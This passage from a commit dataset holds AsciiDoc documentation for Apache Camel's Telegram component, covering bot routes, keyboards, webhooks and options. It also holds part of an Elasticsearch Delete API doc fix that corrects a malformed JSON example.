only\n\n|===================================================\n\n\n\n\n== Reactive Chat-Bot Example\n\nThe reactive chat-bot mode is a simple way of using the Camel component to build a simple\nchat bot that replies directly to chat messages received from the Telegram users.\n\nThe following is a basic configuration of the chat-bot in Java DSL\n\n[source,java]\n---------------------------------------------------------\nfrom(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\")\n.bean(ChatBotLogic.class)\n.to(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\");\n---------------------------------------------------------\n\nor in Spring XML\n\n[source,xml]\n---------------------------------------------\n<route>\n <from uri=\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\"\/>\n <bean ref=\"chatBotLogic\" \/>\n <to uri=\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\"\/>\n<route>\n\n<bean id=\"chatBotLogic\" class=\"com.example.ChatBotLogic\"\/>\n---------------------------------------------\n\n\nThe `ChatBotLogic` is a simple bean that implements a generic String-to-String method.\n\n[source,java]\n---------------------------------------------------------\npublic class ChatBotLogic {\n\n public String chatBotProcess(String message) {\n if( \"do-not-reply\".equals(message) ) {\n return null; \/\/ no response in the chat\n }\n\n return \"echo from the bot: \" + message; \/\/ echoes the message\n }\n\n}\n---------------------------------------------------------\n\n\nEvery non-null string returned by the `chatBotProcess` method is automatically routed to the\nchat that originated the request (as the `CamelTelegramChatId` header is used to route the message).\n\n== Getting the Chat ID\n\nIf you want to push messages to a specific Telegram chat when an event occurs, you need to\nretrieve the corresponding chat ID. The chat ID is not currently shown in the telegram client,\nbut you can obtain it using a simple route.\n\nFirst, add the bot to the chat where you want to push messages, then run a route like the following one.\n\n[source,java]\n---------------------------------------------------------\nfrom(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\")\n.to(\"log:INFO?showHeaders=true\");\n---------------------------------------------------------\n\nAny message received by the bot will be dumped to your log together with information about the chat (`CamelTelegramChatId`\nheader).\n\nOnce you get the chat ID, you can use the following sample route to push message to it.\n\n[source,java]\n---------------------------------------------------------\nfrom(\"timer:tick\")\n.setBody().constant(\"Hello\")\nto(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere?chatId=123456\")\n---------------------------------------------------------\n\nNote that the corresponding URI parameter is simply `chatId`.\n\n== Customizing keyboard\n\nYou can customize the user keyboard instead of asking him to write an option. `OutgoingTextMessage` has the property `ReplyKeyboardMarkup` which can be used for such thing.\n\n[source,java]\n---------------------------------------------------------\nfrom(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\")\n .process(exchange -> {\n\n OutgoingTextMessage msg = new OutgoingTextMessage();\n msg.setText(\"Choose one option!\");\n\n InlineKeyboardButton buttonOptionOneI = InlineKeyboardButton.builder()\n .text(\"Option One - I\").build();\n\n InlineKeyboardButton buttonOptionOneII = InlineKeyboardButton.builder()\n .text(\"Option One - II\").build();\n\n InlineKeyboardButton buttonOptionTwoI = InlineKeyboardButton.builder()\n .text(\"Option Two - I\").build();\n\n ReplyKeyboardMarkup replyMarkup = ReplyKeyboardMarkup.builder()\n .keyboard()\n .addRow(Arrays.asList(buttonOptionOneI, buttonOptionOneII))\n .addRow(Arrays.asList(buttonOptionTwoI))\n .close()\n .oneTimeKeyboard(true)\n .build();\n\n msg.setReplyKeyboardMarkup(replyMarkup);\n\n exchange.getIn().setBody(msg);\n })\n .to(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\");\n---------------------------------------------------------\n\nIf you want to disable it the next message must have the property `removeKeyboard` set on `ReplyKeyboardMarkup` object.\n\n[source,java]\n---------------------------------------------------------\nfrom(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\")\n .process(exchange -> {\n\n OutgoingTextMessage msg = new OutgoingTextMessage();\n msg.setText(\"Your answer was accepted!\");\n\n ReplyKeyboardMarkup replyMarkup = ReplyKeyboardMarkup.builder()\n .removeKeyboard(true)\n .build();\n\n msg.setReplyKeyboardMarkup(replyMarkup);\n\n exchange.getIn().setBody(msg);\n })\n .to(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\");\n---------------------------------------------------------\n\n\n== Webhook Mode\n\nThe Telegram component supports usage in the *webhook mode* using the *camel-webhook* component.\n\nIn order to enable webhook mode, users need first to add a REST implementation to their application.\nMaven users, for example, can add *netty-http* to their `pom.xml` file:\n\n[source,xml]\n------------------------------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-netty-http<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n------------------------------------------------------------\n\nOnce done, you need to prepend the webhook URI to the telegram URI you want to use.\n\nIn Java DSL:\n\n[source,java]\n---------------------------------------------------------\nfrom(\"webhook:telegram:bots\/123456789:insertYourAuthorizationTokenHere\").to(\"log:info\");\n---------------------------------------------------------\n\nSome endpoints will be exposed by your application and Telegram will be configured to send messages to them.\nYou need to ensure that your server is exposed to the internet and to pass the right value of the\n*camel.component.webhook.configuration.webhook-external-url* property.\n\nRefer to the *camel-webhook* component documentation for instructions on how to set it.\n","old_contents":"[[telegram-component]]\n= Telegram Component\n:page-source: components\/camel-telegram\/src\/main\/docs\/telegram-component.adoc\n\n*Since Camel 2.18*\n\n\/\/ HEADER START\n*Both producer and consumer is supported*\n\/\/ HEADER END\n\nThe Telegram component provides access to the https:\/\/core.telegram.org\/bots\/api[Telegram Bot API].\nIt allows a Camel-based application to send and receive messages by acting as a Bot, participating in\ndirect conversations with normal users, private and public groups or channels.\n\nA Telegram Bot must be created before using this component, following the instructions at the\nhttps:\/\/core.telegram.org\/bots#3-how-do-i-create-a-bot[Telegram Bot developers home].\nWhen a new Bot is created, the https:\/\/telegram.me\/botfather[BotFather] provides an\n**authorization token** corresponding to the Bot. The authorization token is a mandatory parameter\nfor the camel-telegram endpoint.\n\nNOTE: In order to allow the Bot to receive all messages exchanged within a group or channel (not just\nthe ones starting with a '\/' character), ask the BotFather to *disable the privacy mode*, using the\n*\/setprivacy* command.\n\n\nMaven users will need to add the following dependency to their `pom.xml`\nfor this component:\n\n[source,xml]\n------------------------------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-telegram<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n------------------------------------------------------------\n\n== URI format\n\n[source,text]\n----------------------------------------------------\ntelegram:type\/authorizationToken[?options]\n----------------------------------------------------\n\nYou can append query options to the URI in the following format,\n`?option=value&option=value&...`\n\n== Options\n\n\/\/ component options: START\nThe Telegram component supports 7 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *authorizationToken* (security) | The default Telegram authorization token to be used when the information is not provided in the endpoints. | | String\n| *client* (advanced) | To use a custom AsyncHttpClient | | AsyncHttpClient\n| *clientConfig* (advanced) | To configure the AsyncHttpClient to use a custom com.ning.http.client.AsyncHttpClientConfig instance. | | AsyncHttpClientConfig\n| *baseUri* (advanced) | Set an alternative base URI, e.g. when you want to test the component against a mock Telegram API. | https:\/\/api.telegram.org | String\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n|===\n\/\/ component options: END\n\n\n\n\/\/ endpoint options: START\nThe Telegram endpoint is configured using URI syntax:\n\n----\ntelegram:type\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *type* | *Required* The endpoint type. Currently, only the 'bots' type is supported. | | String\n|===\n\n\n=== Query Parameters (31 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *limit* (consumer) | Limit on the number of updates that can be received in a single polling request. | 100 | Integer\n| *sendEmptyMessageWhenIdle* (consumer) | If the polling consumer did not poll any files, you can enable this option to send an empty message (no body) instead. | false | boolean\n| *timeout* (consumer) | Timeout in seconds for long polling. Put 0 for short polling or a bigger number for long polling. Long polling produces shorter response time. | 30 | Integer\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. | | ExchangePattern\n| *pollStrategy* (consumer) | A pluggable org.apache.camel.PollingConsumerPollingStrategy allowing you to provide your custom implementation to control error handling usually occurred during the poll operation before an Exchange have been created and being routed in Camel. | | PollingConsumerPollStrategy\n| *chatId* (producer) | The identifier of the chat that will receive the produced messages. Chat ids can be first obtained from incoming messages (eg. when a telegram user starts a conversation with a bot, its client sends automatically a '\/start' message containing the chat id). It is an optional parameter, as the chat id can be set dynamically for each outgoing message (using body or headers). | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *baseUri* (advanced) | Set an alternative base URI, e.g. when you want to test the component against a mock Telegram API. | | String\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *bufferSize* (advanced) | The initial in-memory buffer size used when transferring data between Camel and AHC Client. | 4096 | int\n| *clientConfig* (advanced) | To configure the AsyncHttpClient to use a custom com.ning.http.client.AsyncHttpClientConfig instance. | | AsyncHttpClientConfig\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *backoffErrorThreshold* (scheduler) | The number of subsequent error polls (failed due some error) that should happen before the backoffMultipler should kick-in. | | int\n| *backoffIdleThreshold* (scheduler) | The number of subsequent idle polls that should happen before the backoffMultipler should kick-in. | | int\n| *backoffMultiplier* (scheduler) | To let the scheduled polling consumer backoff if there has been a number of subsequent idles\/errors in a row. The multiplier is then the number of polls that will be skipped before the next actual attempt is happening again. When this option is in use then backoffIdleThreshold and\/or backoffErrorThreshold must also be configured. | | int\n| *delay* (scheduler) | Milliseconds before the next poll. You can also specify time values using units, such as 60s (60 seconds), 5m30s (5 minutes and 30 seconds), and 1h (1 hour). | 500 | long\n| *greedy* (scheduler) | If greedy is enabled, then the ScheduledPollConsumer will run immediately again, if the previous run polled 1 or more messages. | false | boolean\n| *initialDelay* (scheduler) | Milliseconds before the first poll starts. You can also specify time values using units, such as 60s (60 seconds), 5m30s (5 minutes and 30 seconds), and 1h (1 hour). | 1000 | long\n| *repeatCount* (scheduler) | Specifies a maximum limit of number of fires. So if you set it to 1, the scheduler will only fire once. If you set it to 5, it will only fire five times. A value of zero or negative means fire forever. | 0 | long\n| *runLoggingLevel* (scheduler) | The consumer logs a start\/complete log line when it polls. This option allows you to configure the logging level for that. | TRACE | LoggingLevel\n| *scheduledExecutorService* (scheduler) | Allows for configuring a custom\/shared thread pool to use for the consumer. By default each consumer has its own single threaded thread pool. | | ScheduledExecutorService\n| *scheduler* (scheduler) | To use a cron scheduler from either camel-spring or camel-quartz component | none | String\n| *schedulerProperties* (scheduler) | To configure additional properties when using a custom scheduler or any of the Quartz, Spring based scheduler. | | Map\n| *startScheduler* (scheduler) | Whether the scheduler should be auto started. | true | boolean\n| *timeUnit* (scheduler) | Time unit for initialDelay and delay options. | MILLISECONDS | TimeUnit\n| *useFixedDelay* (scheduler) | Controls if fixed delay or fixed rate is used. See ScheduledExecutorService in JDK for details. | true | boolean\n| *proxyHost* (proxy) | HTTP proxy host which could be used when sending out the message. | | String\n| *proxyPort* (proxy) | HTTP proxy port which could be used when sending out the message. | | Integer\n| *authorizationToken* (security) | *Required* The authorization token for using the bot (ask the BotFather) | | String\n|===\n\/\/ endpoint options: END\n\/\/ spring-boot-auto-configure options: START\n== Spring Boot Auto-Configuration\n\nWhen using Spring Boot make sure to use the following Maven dependency to have support for auto configuration:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel.springboot<\/groupId>\n <artifactId>camel-telegram-starter<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n\nThe component supports 8 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *camel.component.telegram.authorization-token* | The default Telegram authorization token to be used when the information is not provided in the endpoints. | | String\n| *camel.component.telegram.base-uri* | Set an alternative base URI, e.g. when you want to test the component against a mock Telegram API. | | String\n| *camel.component.telegram.basic-property-binding* | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | Boolean\n| *camel.component.telegram.bridge-error-handler* | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | Boolean\n| *camel.component.telegram.client* | To use a custom AsyncHttpClient. The option is a org.asynchttpclient.AsyncHttpClient type. | | String\n| *camel.component.telegram.client-config* | To configure the AsyncHttpClient to use a custom com.ning.http.client.AsyncHttpClientConfig instance. The option is a org.asynchttpclient.AsyncHttpClientConfig type. | | String\n| *camel.component.telegram.enabled* | Whether to enable auto configuration of the telegram component. This is enabled by default. | | Boolean\n| *camel.component.telegram.lazy-start-producer* | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | Boolean\n|===\n\/\/ spring-boot-auto-configure options: END\n\n\n\n\n\n== Message Headers\n\n[width=\"100%\",cols=\"20%,80%\",options=\"header\",]\n|=======================================================================\n|Name |Description\n|`CamelTelegramChatId` |This header is used by the producer endpoint in order to\nresolve the chat id that will receive the message. The recipient chat id can be\nplaced (in order of priority) in message body, in the `CamelTelegramChatId` header\nor in the endpoint configuration (`chatId` option).\nThis header is also present in all incoming messages.\n\n|`CamelTelegramMediaType` |This header is used to identify the media type when\nthe outgoing message is composed of pure binary data. Possible values are strings or enum values\nbelonging to the `org.apache.camel.component.telegram.TelegramMediaType` enumeration.\n\n|`CamelTelegramMediaTitleCaption` |This header is used to provide a caption or title\nfor outgoing binary messages.\n\n|`CamelTelegramParseMode` |This header is used to format text messages using HTML or Markdown (see `org.apache.camel.component.telegram.TelegramParseMode`).\n\n|=======================================================================\n\n== Usage\n\nThe Telegram component supports both consumer and producer endpoints.\nIt can also be used in *reactive chat-bot mode* (to consume, then produce messages).\n\n== Producer Example\n\nThe following is a basic example of how to send a message to a Telegram chat through the\nTelegram Bot API.\n\nin Java DSL\n\n[source,java]\n---------------------------------------------------------\nfrom(\"direct:start\").to(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\");\n---------------------------------------------------------\n\nor in Spring XML\n\n[source,xml]\n---------------------------------------------\n<route>\n <from uri=\"direct:start\"\/>\n <to uri=\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\"\/>\n<route>\n---------------------------------------------\n\nThe code `123456789:insertYourAuthorizationTokenHere` is the *authorization token* corresponding to the Bot.\n\nWhen using the producer endpoint without specifying the *chat id* option, the target chat will be identified using information contained in the body or headers of the message.\nThe following message bodies are allowed for a producer endpoint (messages of type `OutgoingXXXMessage` belong to the package `org.apache.camel.component.telegram.model`)\n\n[width=\"100%\",cols=\"40%,60%\",options=\"header\",]\n|===================================================\n| Java Type | Description\n\n| `OutgoingTextMessage` | To send a text message to a chat\n| `OutgoingPhotoMessage` | To send a photo (JPG, PNG) to a chat\n| `OutgoingAudioMessage` | To send a mp3 audio to a chat\n| `OutgoingVideoMessage` | To send a mp4 video to a chat\n| `OutgoingDocumentMessage` | To send a file to a chat (any media type)\n| `OutgoingStickerMessage` | To send a sticker to a chat (WEBP)\n| `SendLocationMessage` | To send a location (setSendLocation)\n| `EditMessageLiveLocationMessage` | To send changes to a live location (editMessageLiveLocation)\n| `StopMessageLiveLocationMessage` | To stop updating a live location message sent by the bot or via the bot (for inline bots) before live_period expires (stopMessageLiveLocation)\n| `SendVenueMessage` | To send information about a venue (sendVenue)\n| `byte[]` | To send any media type supported. It requires the `CamelTelegramMediaType` header to be set to the appropriate media type\n| `String` | To send a text message to a chat. It gets converted automatically into a `OutgoingTextMessage`\n\n|===================================================\n\n\n== Consumer Example\n\nThe following is a basic example of how to receive all messages that telegram users are sending to the configured Bot.\nIn Java DSL\n\n[source,java]\n---------------------------------------------------------\nfrom(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\")\n.bean(ProcessorBean.class)\n---------------------------------------------------------\n\nor in Spring XML\n\n[source,xml]\n---------------------------------------------\n<route>\n <from uri=\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\"\/>\n <bean ref=\"myBean\" \/>\n<route>\n\n<bean id=\"myBean\" class=\"com.example.MyBean\"\/>\n---------------------------------------------\n\nThe `MyBean` is a simple bean that will receive the messages\n\n[source,java]\n---------------------------------------------------------\npublic class MyBean {\n\n public void process(String message) {\n \/\/ or Exchange, or org.apache.camel.component.telegram.model.IncomingMessage (or both)\n\n \/\/ do process\n }\n\n}\n---------------------------------------------------------\n\n\nSupported types for incoming messages are\n\n[width=\"100%\",cols=\"40%,60%\",options=\"header\",]\n|===================================================\n| Java Type | Description\n\n| `IncomingMessage` | The full object representation of an incoming message\n| `String` | The content of the message, for text messages only\n\n|===================================================\n\n\n\n\n== Reactive Chat-Bot Example\n\nThe reactive chat-bot mode is a simple way of using the Camel component to build a simple\nchat bot that replies directly to chat messages received from the Telegram users.\n\nThe following is a basic configuration of the chat-bot in Java DSL\n\n[source,java]\n---------------------------------------------------------\nfrom(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\")\n.bean(ChatBotLogic.class)\n.to(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\");\n---------------------------------------------------------\n\nor in Spring XML\n\n[source,xml]\n---------------------------------------------\n<route>\n <from uri=\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\"\/>\n <bean ref=\"chatBotLogic\" \/>\n <to uri=\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\"\/>\n<route>\n\n<bean id=\"chatBotLogic\" class=\"com.example.ChatBotLogic\"\/>\n---------------------------------------------\n\n\nThe `ChatBotLogic` is a simple bean that implements a generic String-to-String method.\n\n[source,java]\n---------------------------------------------------------\npublic class ChatBotLogic {\n\n public String chatBotProcess(String message) {\n if( \"do-not-reply\".equals(message) ) {\n return null; \/\/ no response in the chat\n }\n\n return \"echo from the bot: \" + message; \/\/ echoes the message\n }\n\n}\n---------------------------------------------------------\n\n\nEvery non-null string returned by the `chatBotProcess` method is automatically routed to the\nchat that originated the request (as the `CamelTelegramChatId` header is used to route the message).\n\n== Getting the Chat ID\n\nIf you want to push messages to a specific Telegram chat when an event occurs, you need to\nretrieve the corresponding chat ID. The chat ID is not currently shown in the telegram client,\nbut you can obtain it using a simple route.\n\nFirst, add the bot to the chat where you want to push messages, then run a route like the following one.\n\n[source,java]\n---------------------------------------------------------\nfrom(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\")\n.to(\"log:INFO?showHeaders=true\");\n---------------------------------------------------------\n\nAny message received by the bot will be dumped to your log together with information about the chat (`CamelTelegramChatId`\nheader).\n\nOnce you get the chat ID, you can use the following sample route to push message to it.\n\n[source,java]\n---------------------------------------------------------\nfrom(\"timer:tick\")\n.setBody().constant(\"Hello\")\nto(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere?chatId=123456\")\n---------------------------------------------------------\n\nNote that the corresponding URI parameter is simply `chatId`.\n\n== Customizing keyboard\n\nYou can customize the user keyboard instead of asking him to write an option. `OutgoingTextMessage` has the property `ReplyKeyboardMarkup` which can be used for such thing.\n\n[source,java]\n---------------------------------------------------------\nfrom(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\")\n .process(exchange -> {\n\n OutgoingTextMessage msg = new OutgoingTextMessage();\n msg.setText(\"Choose one option!\");\n\n InlineKeyboardButton buttonOptionOneI = InlineKeyboardButton.builder()\n .text(\"Option One - I\").build();\n\n InlineKeyboardButton buttonOptionOneII = InlineKeyboardButton.builder()\n .text(\"Option One - II\").build();\n\n InlineKeyboardButton buttonOptionTwoI = InlineKeyboardButton.builder()\n .text(\"Option Two - I\").build();\n\n ReplyKeyboardMarkup replyMarkup = ReplyKeyboardMarkup.builder()\n .keyboard()\n .addRow(Arrays.asList(buttonOptionOneI, buttonOptionOneII))\n .addRow(Arrays.asList(buttonOptionTwoI))\n .close()\n .oneTimeKeyboard(true)\n .build();\n\n msg.setReplyKeyboardMarkup(replyMarkup);\n\n exchange.getIn().setBody(msg);\n })\n .to(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\");\n---------------------------------------------------------\n\nIf you want to disable it the next message must have the property `removeKeyboard` set on `ReplyKeyboardMarkup` object.\n\n[source,java]\n---------------------------------------------------------\nfrom(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\")\n .process(exchange -> {\n\n OutgoingTextMessage msg = new OutgoingTextMessage();\n msg.setText(\"Your answer was accepted!\");\n\n ReplyKeyboardMarkup replyMarkup = ReplyKeyboardMarkup.builder()\n .removeKeyboard(true)\n .build();\n\n msg.setReplyKeyboardMarkup(replyMarkup);\n\n exchange.getIn().setBody(msg);\n })\n .to(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\");\n---------------------------------------------------------\n\n\n== Webhook Mode\n\nThe Telegram component supports usage in the *webhook mode* using the *camel-webhook* component.\n\nIn order to enable webhook mode, users need first to add a REST implementation to their application.\nMaven users, for example, can add *netty-http* to their `pom.xml` file:\n\n[source,xml]\n------------------------------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-netty-http<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n------------------------------------------------------------\n\nOnce done, you need to prepend the webhook URI to the telegram URI you want to use.\n\nIn Java DSL:\n\n[source,java]\n---------------------------------------------------------\nfrom(\"webhook:telegram:bots\/123456789:insertYourAuthorizationTokenHere\").to(\"log:info\");\n---------------------------------------------------------\n\nSome endpoints will be exposed by your application and Telegram will be configured to send messages to them.\nYou need to ensure that your server is exposed to the internet and to pass the right value of the\n*camel.component.webhook.configuration.webhook-external-url* property.\n\nRefer to the *camel-webhook* component documentation for instructions on how to set it.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c09760f73d5aafa4e1f7a7b57b80c4d79f2e8ade","subject":"Fix malformed JSON in Delete API example (#21168)","message":"Fix malformed JSON in Delete API example (#21168)\n\nObviously, there should be\r\n\r\n \"result\": \"deleted\"\r\n\r\ninstead of\r\n\r\n \"result: deleted\"","repos":"strapdata\/elassandra5-rc,strapdata\/elassandra5-rc,strapdata\/elassandra5-rc,strapdata\/elassandra5-rc,strapdata\/elassandra5-rc","old_file":"docs\/reference\/docs\/delete.asciidoc","new_file":"docs\/reference\/docs\/delete.asciidoc","new_contents":"[[docs-delete]]\n== Delete API\n\nThe delete API allows to delete a typed JSON document from a specific\nindex based on its id. The following example deletes the JSON document\nfrom an index called twitter, under a type called tweet, with id valued\n1:\n\n[source,js]\n--------------------------------------------------\n$ curl -XDELETE 'http:\/\/localhost:9200\/twitter\/tweet\/1'\n--------------------------------------------------\n\nThe result of the above delete operation is:\n\n[source,js]\n--------------------------------------------------\n{\n \"_shards\" : {\n \"total\" : 10,\n \"failed\" : 0,\n \"successful\" : 10\n },\n \"found\" : true,\n \"_index\" : \"twitter\",\n \"_type\" : \"tweet\",\n \"_id\" : \"1\",\n \"_version\" : 2,\n \"result\": \"deleted\"\n}\n--------------------------------------------------\n\n[float]\n[[delete-versioning]]\n=== Versioning\n\nEach document indexed is versioned. When deleting a document, the\n`version` can be specified to make sure the relevant document we are\ntrying to delete is actually being deleted and it has not changed in the\nmeantime. Every write operation executed on a document, deletes included,\ncauses its version to be incremented.\n\n[float]\n[[delete-routing]]\n=== Routing\n\nWhen indexing using the ability to control the routing, in order to\ndelete a document, the routing value should also be provided. For\nexample:\n\n[source,js]\n--------------------------------------------------\n$ curl -XDELETE 'http:\/\/localhost:9200\/twitter\/tweet\/1?routing=kimchy'\n--------------------------------------------------\n\nThe above will delete a tweet with id 1, but will be routed based on the\nuser. Note, issuing a delete without the correct routing, will cause the\ndocument to not be deleted.\n\nWhen the `_routing` mapping is set as `required` and no routing value is\nspecified, the delete api will throw a `RoutingMissingException` and reject\nthe request.\n\n[float]\n[[delete-parent]]\n=== Parent\n\nThe `parent` parameter can be set, which will basically be the same as\nsetting the routing parameter.\n\nNote that deleting a parent document does not automatically delete its\nchildren. One way of deleting all child documents given a parent's id is\nto use the <<docs-delete-by-query,Delete By Query API>> to perform a\n index with the automatically generated (and indexed)\nfield _parent, which is in the format parent_type#parent_id.\n\nWhen deleting a child document its parent id must be specified, otherwise\nthe delete request will be rejected and a `RoutingMissingException` will be\nthrown instead.\n\n[float]\n[[delete-index-creation]]\n=== Automatic index creation\n\nThe delete operation automatically creates an index if it has not been\ncreated before (check out the <<indices-create-index,create index API>>\nfor manually creating an index), and also automatically creates a\ndynamic type mapping for the specific type if it has not been created\nbefore (check out the <<indices-put-mapping,put mapping>>\nAPI for manually creating type mapping).\n\n[float]\n[[delete-distributed]]\n=== Distributed\n\nThe delete operation gets hashed into a specific shard id. It then gets\nredirected into the primary shard within that id group, and replicated\n(if needed) to shard replicas within that id group.\n\n[float]\n[[delete-wait-for-active-shards]]\n=== Wait For Active Shards\n\nWhen making delete requests, you can set the `wait_for_active_shards`\nparameter to require a minimum number of shard copies to be active\nbefore starting to process the delete request. See\n<<index-wait-for-active-shards,here>> for further details and a usage\nexample.\n\n[float]\n[[delete-refresh]]\n=== Refresh\n\nControl when the changes made by this request are visible to search. See\n<<docs-refresh>>.\n\n\n[float]\n[[delete-timeout]]\n=== Timeout\n\nThe primary shard assigned to perform the delete operation might not be\navailable when the delete operation is executed. Some reasons for this\nmight be that the primary shard is currently recovering from a store\nor undergoing relocation. By default, the delete operation will wait on\nthe primary shard to become available for up to 1 minute before failing\nand responding with an error. The `timeout` parameter can be used to\nexplicitly specify how long it waits. Here is an example of setting it\nto 5 minutes:\n\n[source,js]\n--------------------------------------------------\n$ curl -XDELETE 'http:\/\/localhost:9200\/twitter\/tweet\/1?timeout=5m'\n--------------------------------------------------\n","old_contents":"[[docs-delete]]\n== Delete API\n\nThe delete API allows to delete a typed JSON document from a specific\nindex based on its id. The following example deletes the JSON document\nfrom an index called twitter, under a type called tweet, with id valued\n1:\n\n[source,js]\n--------------------------------------------------\n$ curl -XDELETE 'http:\/\/localhost:9200\/twitter\/tweet\/1'\n--------------------------------------------------\n\nThe result of the above delete operation is:\n\n[source,js]\n--------------------------------------------------\n{\n \"_shards\" : {\n \"total\" : 10,\n \"failed\" : 0,\n \"successful\" : 10\n },\n \"found\" : true,\n \"_index\" : \"twitter\",\n \"_type\" : \"tweet\",\n \"_id\" : \"1\",\n \"_version\" : 2,\n \"result: deleted\"\n}\n--------------------------------------------------\n\n[float]\n[[delete-versioning]]\n=== Versioning\n\nEach document indexed is versioned. When deleting a document, the\n`version` can be specified to make sure the relevant document we are\ntrying to delete is actually being deleted and it has not changed in the\nmeantime. Every write operation executed on a document, deletes included,\ncauses its version to be incremented.\n\n[float]\n[[delete-routing]]\n=== Routing\n\nWhen indexing using the ability to control the routing, in order to\ndelete a document, the routing value should also be provided. For\nexample:\n\n[source,js]\n--------------------------------------------------\n$ curl -XDELETE 'http:\/\/localhost:9200\/twitter\/tweet\/1?routing=kimchy'\n--------------------------------------------------\n\nThe above will delete a tweet with id 1, but will be routed based on the\nuser. Note, issuing a delete without the correct routing, will cause the\ndocument to not be deleted.\n\nWhen the `_routing` mapping is set as `required` and no routing value is\nspecified, the delete api will throw a `RoutingMissingException` and reject\nthe request.\n\n[float]\n[[delete-parent]]\n=== Parent\n\nThe `parent` parameter can be set, which will basically be the same as\nsetting the routing parameter.\n\nNote that deleting a parent document does not automatically delete its\nchildren. One way of deleting all child documents given a parent's id is\nto use the <<docs-delete-by-query,Delete By Query API>> to perform a\n index with the automatically generated (and indexed)\nfield _parent, which is in the format parent_type#parent_id.\n\nWhen deleting a child document its parent id must be specified, otherwise\nthe delete request will be rejected and a `RoutingMissingException` will be\nthrown instead.\n\n[float]\n[[delete-index-creation]]\n=== Automatic index 